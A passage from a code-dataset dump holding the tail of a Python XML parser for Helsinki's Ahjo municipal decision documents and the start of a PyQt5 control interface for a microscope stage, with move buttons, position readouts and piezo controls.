)?'\n # Start time, e.g. '7:25' = GROUP 2\n r'(\\d{1,2}[:.]\\d\\d)'\n # Separator dash, e.g. ' - ' or '-'\n r' ?- ?'\n # End time, e.g. '9:40' = GROUP 3\n r'(\\d{1,2}[:.]\\d\\d)')\n\n\nclass XmlParser:\n @classmethod\n def clean_html(cls, raw):\n # TODO\n return ''.join([str(etree.tostring(el)) for el in raw])\n\n @classmethod\n def parse_funcid(cls, raw):\n \"\"\"\n Parse given function id to a sensible format.\n\n :type raw: str\n :param raw:\n The function id as it appears in Ahjo XMLs.\n Example: 00 00 03 Valtuuston aloitetoiminta\n :rtype: tuple(str, str)\n :return:\n A tuple with the number part and the text part.\n With the given example this would be ('00 00 03',\n 'Valtuuston aloitetoiminta')\n \"\"\"\n\n if raw is None:\n return (None, None)\n\n match = re.fullmatch(r'((?:\\d\\d ){0,}\\d\\d) (.*)', raw)\n return (match.group(1), match.group(2))\n\n @classmethod\n def parse_name(cls, name):\n \"\"\"\n Parse human names\n\n :type raw: str\n :param raw: Name in the format 'last, first'\n :rtype: str\n :return: Name in the format 'first last'\n \"\"\"\n\n if ', ' in name:\n name = name.split(', ')\n name = '{} {}'.format(name[1], name[0])\n\n return name\n\n @classmethod\n def parse_datetime(cls, raw):\n \"\"\"\n Parse timestamps appearing in the AHJO xml.\n\n :type raw: str\n :param raw: Timestamp in one of the specified formats\n :rtype: datetime\n :return: A localized datetime object\n :raises ParseError: if the date isn't in any of the specified formats\n \"\"\"\n\n if raw is None:\n return None\n\n date = None\n\n formats = [\n '%m/%d/%Y %I:%M:%S %p',\n '%m/%d/%Y %H:%M:%S',\n\n '%d.%m.%Y %I:%M:%S %p',\n '%d.%m.%Y %H:%M:%S',\n ]\n\n for fmt in formats:\n try:\n date = datetime.datetime.strptime(raw, fmt)\n break\n except ValueError as r:\n pass\n\n if date is None:\n raise ParseError('Unknown timestamp')\n\n return LOCAL_TZ.localize(date)\n\n @classmethod\n def parse_datetime_range(cls, raw):\n \"\"\"\n Parse datetime range string to a pair of datetimes.\n\n :type raw: str|None\n :rtype: (datetime.datetime, datetime.datetime)|None\n \"\"\"\n m = DATE_RANGE_RX.match(raw or '')\n if not m:\n return None\n date_str = m.group(1)\n start_str = date_str + ' ' + m.group(2).replace('.', ':')\n end_str = date_str + ' ' + m.group(3).replace('.', ':')\n try:\n start = datetime.datetime.strptime(start_str, '%d.%m.%Y %H:%M')\n end = datetime.datetime.strptime(end_str, '%d.%m.%Y %H:%M')\n except ValueError:\n return None\n return (start, end)\n\n @classmethod\n def gt(cls, parent, el_name, log=lambda x: None, fmt=lambda x: x):\n \"\"\"\n Get text of an element. If the element doesn't exist, we\n log something using the log parameter.\n\n :type parent: Element\n :param parent: Parent element where the element should be searched format\n\n :type el_name: str\n :param el_name: Name of the child element\n\n :type log: function\n :param log: Logger function to be called if the element isn't found\n\n :type fmt: function\n :param fmt: If present, will be called with the retrieved text\n\n :rtype: str or None\n :return: Text of an element if found. None otherwise.\n \"\"\"\n\n el = parent.find(el_name)\n if el is None:\n log(\"Element {} not found\".format(el_name))\n return None\n else:\n content = el.text\n if content is None:\n log(\"Element {} is empty\".format(el_name))\n return content\n\n return fmt(content)\n\n def import_attendees(self, ctx, lasnaolotiedot):\n \"\"\"\n Parse attendees of an event.\n\n Simplified example structure::\n \n \n Jäsenet\n \n Lastname, Firstname\n some title\n \n puheenjohtaja\n \n \n \n\n Returned list::\n [\n {\n 'name': 'Firstname Lastname',\n 'role': 'puheenjohtaja',\n 'title': 'some title',\n 'category': 'participant'\n }\n ]\n \"\"\"\n\n ret = []\n\n attendee_group_els = lasnaolotiedot.findall('.//Osallistujaryhma')\n\n for attendee_group_el in attendee_group_els:\n group_name = self.gt(attendee_group_el, 'OsallistujaryhmaOtsikko', ctx.error)\n attendees = attendee_group_el.findall('Osallistujat')\n\n for attendee in attendees:\n a_attrs = {}\n\n name = attendee.find('Nimi')\n if name is not None and name.text:\n a_attrs['name'] = self.parse_name(name.text)\n else:\n ctx.warning(\"Attendee doesn't have a name\")\n continue\n\n opts = attendee.find('OsallistujaOptiot')\n if opts is not None:\n _set_if_non_empty(a_attrs, 'role', self.gt(opts, 'Rooli'))\n\n _set_if_non_empty(a_attrs, 'title', self.gt(attendee, 'Titteli'))\n\n category = ATTENDEE_MAP.get((group_name or '').lower())\n a_attrs['category'] = (category or 'participant')\n\n ret.append(a_attrs)\n\n return ret\n\n def import_event(self, ctx, data1, data2):\n \"\"\"\n Parse an event's metadata from the document.\n\n A single document only contains one event, so this function\n only exists to split the code around a little.\n \"\"\"\n\n attrs = {}\n\n if data1 is not None:\n lasnaolotiedot = data1.find('Lasnaolotiedot')\n attrs['attendees'] = self.import_attendees(ctx, lasnaolotiedot)\n\n kokoustiedot = data1.find('Kokoustiedot')\n location = self.gt(kokoustiedot, 'Kokouspaikka')\n if location:\n attrs['location'] = location\n\n # format: dd.mm.yyyy hh:mm - hh:mm, possible extra stuff\n\n # This should be probably improved at some point but it's hard to Convert\n # all cases because it's not standard in any way. Sometimes there are breaks\n # or the event has been held in multiple sessions at different times. How\n # would this even be represented in the database?\n datetime_str = self.gt(kokoustiedot, 'Kokousaika')\n date_range = self.parse_datetime_range(datetime_str)\n if date_range:\n attrs['start_date'] = LOCAL_TZ.localize(date_range[0])\n attrs['end_date'] = LOCAL_TZ.localize(date_range[1])\n\n if data2 is not None:\n attrs['name'] = '{} {}'.format(self.gt(data2, 'Paattaja'), self.gt(data2, 'Asiakirjatunnus'))\n else:\n attrs['name'] = ''\n\n if not attrs.get('start_date') and data2 is not None:\n date_str = self.gt(data2, 'Paivays')\n if date_str:\n date = datetime.datetime.strptime(date_str, '%Y-%m-%d')\n attrs['start_date'] = LOCAL_TZ.localize(date)\n attrs['end_date'] = LOCAL_TZ.localize(date)\n\n if not attrs.get('start_date') or not attrs.get('end_date'):\n raise ParseError('No date information found')\n\n return attrs\n\n def import_content(self, ctx, content):\n \"\"\"\n Parse the content section of a single action.\n \"\"\"\n\n if content is None:\n return None\n\n s = \"\"\n\n for section in content:\n heading = self.gt(section, 'SisaltoOtsikko')\n if heading is not None:\n s += '

    {}

    \\n'.format(heading)\n\n mystery = section.find('TekstiSektio/taso1')\n if mystery is not None:\n for el in mystery:\n if el.tag == 'Kappale':\n s += '

    {}

    \\n'.format(self.gt(el, 'KappaleTeksti'))\n elif el.tag == 'Otsikko':\n s += '

    {}

    \\n'.format(el.text)\n elif el.tag == 'XHTML':\n s += self.clean_html(el)\n\n return s\n\n def import_action(self, ctx, action):\n \"\"\"\n Parse a single action.\n \"\"\"\n\n attrs = {}\n\n metadata = action.find('KuvailutiedotOpenDocument')\n\n vakiopaatos = False\n asktieto = self.gt(metadata, 'AsiakirjallinenTieto')\n if asktieto is not None and 'vakiopäätös' in asktieto:\n vakiopaatos = True\n\n attrs['title'] = self.gt(metadata, 'Otsikko', ctx.warning)\n ctx.current_action = attrs['title']\n\n (function_id, function_name) = self.parse_funcid(\n self.gt(metadata, 'Tehtavaluokka', ctx.warning))\n _set_if_non_empty(attrs, 'function_id', function_id)\n _set_if_non_empty(attrs, 'function_name', function_name)\n\n case_guid = parse_guid(self.gt(metadata, 'AsiaGuid'))\n if case_guid is None and not vakiopaatos:\n ctx.error(\"Action doesn't have an associated case\")\n _set_if_non_empty(attrs, 'case_guid', case_guid)\n\n _set_if_non_empty(\n attrs, 'date',\n self.parse_datetime(self.gt(metadata, 'Paatospaiva', ctx.error)))\n article_number = self.gt(metadata, 'Pykala', ctx.error, fmt=int)\n if article_number is not None:\n attrs['article_number'] = article_number\n\n register_id = self.gt(metadata, 'Dnro/DnroLyhyt')\n if register_id is None and not vakiopaatos:\n ctx.error(\"Action doesn't have a register id (diaarinumero)\")\n _set_if_non_empty(attrs, 'register_id', register_id)\n\n resolution_el = metadata.find('Asiakirjantila')\n\n if resolution_el is not None:\n try:\n attrs['resolution'] = RESOLUTION_MAP[resolution_el.text.lower()]\n except KeyError:\n ctx.warning(\"Unknown resolution type: {}\".format(resolution_el.text))\n else:\n ctx.warning(\"Action doesn't have a resolution\")\n\n content = action.find('SisaltoSektioToisto')\n attrs['content'] = self.import_content(ctx, content)\n\n keywords = action.findall('Asiasana')\n attrs['keywords'] = [{'name': kw.text} for kw in keywords]\n\n attrs['attachments'] = []\n attachments = action.findall('LiitteetOptio/Liitteet/LiitteetToisto')\n for a in attachments:\n name = self.gt(a, 'Liiteteksti')\n public = not name == 'Salassa pidettävä' and self.gt(a, 'JulkaisuKytkin') == 'true'\n confidentiality_reason = self.gt(a, 'SalassapitoOptio/SalassapidonPerustelut')\n if not confidentiality_reason:\n confidentiality_reason = ''\n attrs['attachments'].append({\n 'id': parse_guid(self.gt(a, 'LiitteetId')),\n 'name': name,\n 'ordering': self.gt(a, 'Liitenumero', fmt=int),\n 'public': public,\n 'confidentiality_reason': confidentiality_reason\n })\n\n return attrs\n\n def import_document(self, ctx, root):\n \"\"\"\n Parse a single 'pöytäkirja' or 'viranhaltijan päätös'.\n \"\"\"\n\n attrs = {}\n\n event_metadata = root.find('PkKansilehtiSektio/KansilehtiToisto')\n event_metadata2 = root.find('YlatunnisteSektio')\n\n actions = root.find('Paatokset')\n\n attrs['type'] = 'minutes'\n attrs['event'] = self.import_event(ctx, event_metadata, event_metadata2)\n attrs['event']['actions'] = [self.import_action(ctx, ac) for ac in actions]\n\n # If this is a viranhaltijan päätös, we will add the\n # viranhaltija as the only person to the attendees.\n signatures = root.find('SahkoinenAllekirjoitusSektio')\n if signatures is None:\n signatures = root.find('AllekirjoitusSektio')\n chairman = signatures.find('PuheenjohtajaSektio').find('PuheenjohtajaToisto')\n name = chairman.find('Puheenjohtajanimi').text\n\n if name not in [a['name'] for a in attrs['event']['attendees']]:\n attrs['event']['attendees'].append({\n 'name': name,\n 'role': 'viranhaltija',\n })\n\n return attrs\n\n def import_esityslista(self, ctx, root):\n raise NotImplementedError(\"Parsing of agendas is not implemented\")\n\n def parse(self, source, except_treshold=logging.CRITICAL):\n \"\"\"\n Initiate parsing of a single document.\n \"\"\"\n\n filename = source if isinstance(source, str) else source.name\n ctx = ParseContext(filename, except_treshold)\n\n xml = etree.parse(source)\n root = xml.getroot()\n\n if root.tag == 'Poytakirja':\n data = self.import_document(ctx, root)\n elif root.tag == 'Esityslista':\n data = self.import_esityslista(ctx, root)\n else:\n raise ValueError(\"Unknown root tag: {!r}\".format(root.tag))\n\n return Document(data, ctx.errors)\n\n\ndef _set_if_non_empty(mapping, key, value):\n if value:\n mapping[key] = value\n\n\nclass ParseContext:\n \"\"\"\n Helper class for easing the tracking of errors.\n \"\"\"\n\n def __init__(self, filename, except_treshold=logging.CRITICAL):\n self.filename = filename\n self.errors = []\n self.except_treshold = except_treshold\n self.current_action = None\n\n def log(self, severity, msg):\n human_readable = '{} (File: {}, Action: {})'.format(msg, self.filename, self.current_action)\n LOG.log(severity, human_readable)\n\n attrs = ['current_action']\n\n state = {attr: getattr(self, attr) for attr in attrs}\n state['filename'] = self.filename\n\n self.errors.append({\n 'msg': msg,\n 'severity': severity,\n 'state': state\n })\n\n if severity >= self.except_treshold:\n raise ParseError(msg)\n\n def critical(self, msg):\n self.log(logging.CRITICAL, msg)\n\n def error(self, msg):\n self.log(logging.ERROR, msg)\n\n def warning(self, msg):\n self.log(logging.WARNING, msg)\n\n def info(self, msg):\n self.log(logging.INFO, msg)\n\n def debug(self, msg):\n self.log(logging.DEBUG, msg)\n","repo_name":"City-of-Helsinki/paatos","sub_path":"decisions/importer/helsinki/ahjo/xmlparser.py","file_name":"xmlparser.py","file_ext":"py","file_size_in_byte":16846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33626028400","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nimport sys\r\nimport os\r\n\r\nclass stageUI(QtWidgets.QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n# self.setupUI()\r\n# self.show()\r\n self.path=os.path.dirname(__file__)\r\n\r\n def setupUI(self):\r\n self.setWindowTitle('stage')\r\n self.setGeometry(400, 400, 500, 500)\r\n self.setMinimumSize(QtCore.QSize(100, 100))\r\n self.setMaximumSize(QtCore.QSize(10000, 10000))\r\n self.gridLayout = QtWidgets.QGridLayout(self)\r\n self.gridLayout.setObjectName(\"gridLayout\")\r\n\r\n\r\n\r\n spacerItem = QtWidgets.QSpacerItem(1, 1, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n spacerItem1=QtWidgets.QSpacerItem(100, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n# z movebutton\r\n self.zGroupBox = QtWidgets.QGroupBox(\"z axis control\",self)\r\n self.zGroupBox.setMinimumSize(QtCore.QSize(100, 120))\r\n self.verticalLayout = QtWidgets.QVBoxLayout(self.zGroupBox)\r\n self.verticalLayout.setSpacing(0)\r\n\r\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.zGroupBox)\r\n self.zupButton = QtWidgets.QPushButton(self.zGroupBox)\r\n self.zupButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\1uparrow-128.png\"))\r\n self.zupButton.setIconSize(QtCore.QSize(40, 40))\r\n self.horizontalLayout.addWidget(self.zupButton)\r\n self.horizontalLayout.addItem(spacerItem)\r\n\r\n self.zupLButton = QtWidgets.QPushButton(self.zGroupBox)\r\n self.zupLButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\2uparrow-128.png\"))\r\n self.zupLButton.setIconSize(QtCore.QSize(40, 40))\r\n self.horizontalLayout.addWidget(self.zupLButton)\r\n self.horizontalLayout.addItem(spacerItem)\r\n self.verticalLayout.addLayout(self.horizontalLayout)\r\n\r\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.zGroupBox)\r\n self.zdownButton = QtWidgets.QPushButton(self.zGroupBox)\r\n self.zdownButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\1downarrow1-128.png\"))\r\n self.zdownButton.setIconSize(QtCore.QSize(40, 40))\r\n self.horizontalLayout_2.addWidget(self.zdownButton)\r\n self.horizontalLayout_2.addItem(spacerItem)\r\n\r\n self.zdownLButton = QtWidgets.QPushButton(self.zGroupBox)\r\n self.zdownLButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\2dowarrow-128.png\"))\r\n self.zdownLButton.setIconSize(QtCore.QSize(40, 40))\r\n self.horizontalLayout_2.addWidget(self.zdownLButton)\r\n self.horizontalLayout_2.addItem(spacerItem)\r\n self.verticalLayout.addLayout(self.horizontalLayout_2)\r\n\r\n self.verticalLayout.addItem(spacerItem)\r\n self.gridLayout.addWidget(self.zGroupBox, 0, 0, 1, 1)\r\n\r\n # gridlayout--verticallayout_5--upbuttons\r\n self.verticalLayout_5 = QtWidgets.QVBoxLayout(self)\r\n self.upLButton = QtWidgets.QPushButton(self)\r\n self.upLButton.setIcon(QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\2uparrow-128.png\"))\r\n self.upLButton.setIconSize(QtCore.QSize(56, 56))\r\n self.verticalLayout_5.addWidget(self.upLButton)\r\n self.upSButton = QtWidgets.QPushButton(self)\r\n self.upSButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\1uparrow-128.png\"))\r\n self.upSButton.setIconSize(QtCore.QSize(56, 56))\r\n self.verticalLayout_5.addWidget(self.upSButton)\r\n self.gridLayout.addLayout(self.verticalLayout_5, 0, 1, 1, 1)\r\n\r\n # gridlayout--(posgroupbox)verticallayout_2--horizontallayout_3+horizontallayout_4+horizontallayout_5\r\n self.posGroupBox = QtWidgets.QGroupBox(\"position\",self)\r\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.posGroupBox)\r\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self)\r\n self.xposLabel = QtWidgets.QLabel('x posi: 1,26 ', self.posGroupBox)\r\n self.horizontalLayout_3.addWidget(self.xposLabel)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout_3)\r\n\r\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout()\r\n self.yposLabel = QtWidgets.QLabel('y posi: ', self.posGroupBox)\r\n self.horizontalLayout_4.addWidget(self.yposLabel)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout_4)\r\n\r\n self.horizontalLayout_14 = QtWidgets.QHBoxLayout()\r\n self.zposLabel = QtWidgets.QLabel('z posi: ', self.posGroupBox)\r\n self.horizontalLayout_14.addWidget(self.zposLabel)\r\n #self.zposText = QtWidgets.QLabel(self.posGroupBox)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout_14)\r\n self.verticalLayout_2.addItem(spacerItem)\r\n\r\n self.horizontalLayout_range1 = QtWidgets.QHBoxLayout()\r\n self.xrangeLabel = QtWidgets.QLabel('x range: ', self.posGroupBox)\r\n self.horizontalLayout_range1.addWidget(self.xrangeLabel)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout_range1)\r\n\r\n self.horizontalLayout_range2 = QtWidgets.QHBoxLayout()\r\n self.yrangeLabel = QtWidgets.QLabel('y range: ', self.posGroupBox)\r\n self.horizontalLayout_range2.addWidget(self.yrangeLabel)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout_range2)\r\n\r\n self.horizontalLayout_range3 = QtWidgets.QHBoxLayout()\r\n self.zrangeLabel = QtWidgets.QLabel('z range: ', self.posGroupBox)\r\n self.horizontalLayout_range3.addWidget(self.zrangeLabel)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout_range3)\r\n self.verticalLayout_2.addItem(spacerItem)\r\n self.posGroupBox.setLayout(self.verticalLayout_2)\r\n self.gridLayout.addWidget(self.posGroupBox, 0, 2, 1, 1)\r\n\r\n# gridlayout--horizontallayout_6--leftbuttons\r\n # homebutton\r\n # horizontallayout_7--rightbuttons\r\n self.horizontalLayout_6 = QtWidgets.QHBoxLayout()\r\n spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_6.addItem(spacerItem3)\r\n self.xlabel=QtWidgets.QLabel('X axis',self)\r\n self.horizontalLayout_6.addWidget(self.xlabel)\r\n self.leftLButton = QtWidgets.QPushButton(self)\r\n self.leftLButton.setMinimumSize(QtCore.QSize(68, 66))\r\n self.leftLButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\2leftarrow-128.png\"))\r\n self.leftLButton.setIconSize(QtCore.QSize(56, 56))\r\n self.horizontalLayout_6.addWidget(self.leftLButton)\r\n\r\n self.leftSButton = QtWidgets.QPushButton(self)\r\n self.leftSButton.setMinimumSize(QtCore.QSize(52, 66))\r\n self.leftSButton.setMaximumSize(QtCore.QSize(52, 66))\r\n self.leftSButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\1leftarrow-128.png\"))\r\n self.leftSButton.setIconSize(QtCore.QSize(56, 56))\r\n self.horizontalLayout_6.addWidget(self.leftSButton)\r\n self.gridLayout.addLayout(self.horizontalLayout_6, 1, 0, 1, 1)\r\n\r\n self.horizontalLayout_11 = QtWidgets.QHBoxLayout()\r\n self.rightSButton = QtWidgets.QPushButton(self)\r\n self.rightSButton.setMinimumSize(QtCore.QSize(52, 66))\r\n self.rightSButton.setMaximumSize(QtCore.QSize(52, 66))\r\n self.rightSButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\1rightarrow-128.png\"))\r\n self.rightSButton.setIconSize(QtCore.QSize(56, 56))\r\n self.horizontalLayout_11.addWidget(self.rightSButton)\r\n\r\n self.rightLButton = QtWidgets.QPushButton(self)\r\n self.rightLButton.setMinimumSize(QtCore.QSize(68, 66))\r\n self.rightLButton.setMaximumSize(QtCore.QSize(68, 66))\r\n self.rightLButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\2rightarrow-128.png\"))\r\n self.rightLButton.setIconSize(QtCore.QSize(56, 56))\r\n self.horizontalLayout_11.addWidget(self.rightLButton)\r\n spacerItem4 = QtWidgets.QSpacerItem(10, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_11.addItem(spacerItem4)\r\n\r\n self.exitButton = QtWidgets.QPushButton(\"Exit\",self)\r\n self.exitButton.setMinimumSize(QtCore.QSize(40, 40))\r\n self.exitButton.setMaximumSize(QtCore.QSize(40, 40))\r\n self.horizontalLayout_11.addWidget(self.exitButton)\r\n self.gridLayout.addLayout(self.horizontalLayout_11, 1, 2, 1, 1)\r\n\r\n# gridlayout--(movegroupbox)verticallayout_3--horizontallayout_7+horizontallayout_8+horizontallayout_9\r\n self.moveGroupBox = QtWidgets.QGroupBox(\"customize move\",self)\r\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.moveGroupBox)\r\n self.verticalLayout_3.addItem(spacerItem)\r\n\r\n self.horizontalLayout_m7 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_m7.addItem(spacerItem)\r\n self.xmoveLabel = QtWidgets.QLabel('x', self.moveGroupBox)\r\n self.horizontalLayout_m7.addWidget(self.xmoveLabel)\r\n self.verticalLayout_3.addItem(spacerItem)\r\n self.xmoveDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.moveGroupBox)\r\n self.xmoveDoubleSpinBox.setDecimals(3)\r\n self.xmoveDoubleSpinBox.setMinimum(-10.0)\r\n self.xmoveDoubleSpinBox.setMaximum(10.0)\r\n self.horizontalLayout_m7.addWidget(self.xmoveDoubleSpinBox)\r\n self.verticalLayout_3.addItem(spacerItem1)\r\n self.verticalLayout_3.addLayout(self.horizontalLayout_m7) # horizontallayout_7: xmovelabel+xdoublespinbox\r\n\r\n self.horizontalLayout_m8 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_m8.addItem(spacerItem)\r\n self.ymoveLabel = QtWidgets.QLabel('y', self.moveGroupBox)\r\n self.horizontalLayout_m8.addWidget(self.ymoveLabel)\r\n self.verticalLayout_3.addItem(spacerItem)\r\n self.ymoveDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.moveGroupBox)\r\n self.ymoveDoubleSpinBox.setDecimals(3)\r\n self.ymoveDoubleSpinBox.setMinimum(-10.0)\r\n self.ymoveDoubleSpinBox.setMaximum(10.0)\r\n self.horizontalLayout_m8.addWidget(self.ymoveDoubleSpinBox)\r\n self.verticalLayout_3.addItem(spacerItem)\r\n self.verticalLayout_3.addLayout(self.horizontalLayout_m8)\r\n\r\n self.horizontalLayout_m9 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_m9.addItem(spacerItem)\r\n self.zmoveLabel = QtWidgets.QLabel('z', self.moveGroupBox)\r\n self.zmoveLabel.setObjectName(\"zmoveLabel\")\r\n self.horizontalLayout_m9.addWidget(self.zmoveLabel)\r\n self.zmoveDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.moveGroupBox)\r\n self.zmoveDoubleSpinBox.setDecimals(3)\r\n self.zmoveDoubleSpinBox.setMinimum(-15.0)\r\n self.zmoveDoubleSpinBox.setMaximum(2.4)\r\n self.horizontalLayout_m9.addWidget(self.zmoveDoubleSpinBox)\r\n self.verticalLayout_3.addLayout(self.horizontalLayout_m9) # horizontallayout_7: xmovelabel+xdoublespinbox\r\n\r\n self.verticalLayout_3.addItem(spacerItem4)\r\n\r\n self.horizontalLayout_m10 = QtWidgets.QHBoxLayout()\r\n self.movelabel = QtWidgets.QLabel(self.moveGroupBox)\r\n self.movelabel.setText('Rel_Abs')\r\n self.horizontalLayout_m10.addWidget(self.movelabel)\r\n self.moveComboBox = QtWidgets.QComboBox(self.moveGroupBox)\r\n self.moveComboBox.setObjectName(\"moveComboBox\")\r\n self.moveComboBox.addItems(['Rel', 'Abs'])\r\n self.horizontalLayout_m10.addWidget(self.moveComboBox)\r\n self.verticalLayout_3.addLayout(self.horizontalLayout_m10)\r\n self.verticalLayout_3.addItem(spacerItem4)\r\n\r\n self.horizontalLayout_m11 = QtWidgets.QHBoxLayout()\r\n self.vtype = QtWidgets.QLabel(\"velocity\",self.moveGroupBox)\r\n self.horizontalLayout_m11.addWidget(self.vtype)\r\n self.VDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.moveGroupBox)\r\n self.VDoubleSpinBox.setDecimals(3)\r\n self.VDoubleSpinBox.setMinimum(0.000)\r\n self.VDoubleSpinBox.setMaximum(2.590)\r\n self.horizontalLayout_m11.addWidget(self.VDoubleSpinBox)\r\n self.VON_OFF = QtWidgets.QPushButton(\"OFF\",self.moveGroupBox)\r\n self.VON_OFF.setCheckable(True)\r\n self.horizontalLayout_m11.addWidget(self.VON_OFF)\r\n self.verticalLayout_3.addLayout(self.horizontalLayout_m11)\r\n\r\n self.horizontalLayout_m12 = QtWidgets.QHBoxLayout()\r\n self.Vlimit=QtWidgets.QLabel(self.moveGroupBox)\r\n self.horizontalLayout_m12.addWidget(self.Vlimit)\r\n self.verticalLayout_3.addItem(spacerItem1)\r\n\r\n self.horizontalLayout_m12.addItem(spacerItem)\r\n self.goButton = QtWidgets.QPushButton('Go', self.moveGroupBox)\r\n self.horizontalLayout_m12.addWidget(self.goButton)\r\n self.verticalLayout_3.addLayout(self.horizontalLayout_m12)\r\n self.gridLayout.addWidget(self.moveGroupBox, 2, 0, 1, 1)\r\n\r\n# gridlayout--verticallayout_8--downbutton\r\n self.verticalLayout_8 = QtWidgets.QVBoxLayout()\r\n self.downSButton = QtWidgets.QPushButton(self)\r\n self.downSButton.setMinimumSize(QtCore.QSize(66, 52))\r\n self.downSButton.setMaximumSize(QtCore.QSize(66, 52))\r\n self.downSButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\1downarrow1-128.png\"))\r\n self.downSButton.setIconSize(QtCore.QSize(56, 56))\r\n self.downSButton.setObjectName(\"backwardSButton\")\r\n self.verticalLayout_8.addWidget(self.downSButton)\r\n\r\n self.downLButton = QtWidgets.QPushButton(self)\r\n self.downLButton.setMinimumSize(QtCore.QSize(66, 68))\r\n self.downLButton.setMaximumSize(QtCore.QSize(66, 68))\r\n self.downLButton.setIcon(\r\n QtGui.QIcon(\"D:\\storm-control-python3_pyqt5\\storm-control-python3_pyqt5\\storm_control\\hal4000\\icons\\\\2dowarrow-128.png\"))\r\n self.downLButton.setIconSize(QtCore.QSize(56, 56))\r\n self.downLButton.setObjectName(\"backwardLButton\")\r\n self.verticalLayout_8.addWidget(self.downLButton)\r\n self.gridLayout.addLayout(self.verticalLayout_8, 2, 1, 1, 1)\r\n\r\n # piezo ui\r\n self.piezoGroupBox = QtWidgets.QGroupBox(\"piezo stage\",self)\r\n self.verticalLayout_piezo = QtWidgets.QVBoxLayout(self.piezoGroupBox)\r\n self.verticalLayout_piezo.addItem(spacerItem)\r\n self.horizontalLayout_p1 = QtWidgets.QHBoxLayout()\r\n self.label = QtWidgets.QLabel('z_abs', self.piezoGroupBox)\r\n self.horizontalLayout_p1.addWidget(self.label)\r\n\r\n self.piezo_doublespinbox = QtWidgets.QDoubleSpinBox(self.piezoGroupBox)\r\n self.piezo_doublespinbox.setDecimals(1)\r\n self.piezo_doublespinbox.setMinimum(-200.0)\r\n self.piezo_doublespinbox.setMaximum(200.0)\r\n self.horizontalLayout_p1.addWidget(self.piezo_doublespinbox)\r\n\r\n self.piezo_go = QtWidgets.QPushButton('GO', self.piezoGroupBox)\r\n self.horizontalLayout_p1.addWidget(self.piezo_go)\r\n self.verticalLayout_piezo.addLayout(self.horizontalLayout_p1)\r\n self.verticalLayout_piezo.addItem(spacerItem)\r\n\r\n self.horizontalLayout_p3=QtWidgets.QHBoxLayout(self.piezoGroupBox)\r\n self.zrel_label=QtWidgets.QLabel(\"z_Rel\",self.piezoGroupBox)\r\n self.horizontalLayout_p3.addWidget(self.zrel_label)\r\n\r\n self.zReldoublespinbox=QtWidgets.QDoubleSpinBox()\r\n self.zReldoublespinbox.setMaximum(200)\r\n self.zReldoublespinbox.setValue(0)\r\n self.horizontalLayout_p3.addWidget(self.zReldoublespinbox)\r\n\r\n self.zRel_button=QtWidgets.QPushButton(\"Go\",self.piezoGroupBox)\r\n self.horizontalLayout_p3.addWidget(self.zRel_button)\r\n self.verticalLayout_piezo.addLayout(self.horizontalLayout_p3)\r\n self.verticalLayout_piezo.addItem(spacerItem)\r\n\r\n self.horizontalLayout_p2 = QtWidgets.QHBoxLayout(self.piezoGroupBox)\r\n self.piezo_postext = QtWidgets.QLabel(\"position: \",self.piezoGroupBox)\r\n self.horizontalLayout_p2.addWidget(self.piezo_postext)\r\n self.verticalLayout_piezo.addLayout(self.horizontalLayout_p2)\r\n self.verticalLayout_piezo.addItem(spacerItem)\r\n\r\n self.horizontalLayout_p4 = QtWidgets.QHBoxLayout(self.piezoGroupBox)\r\n self.rangelabel=QtWidgets.QLabel(\"range: \",self.piezoGroupBox)\r\n 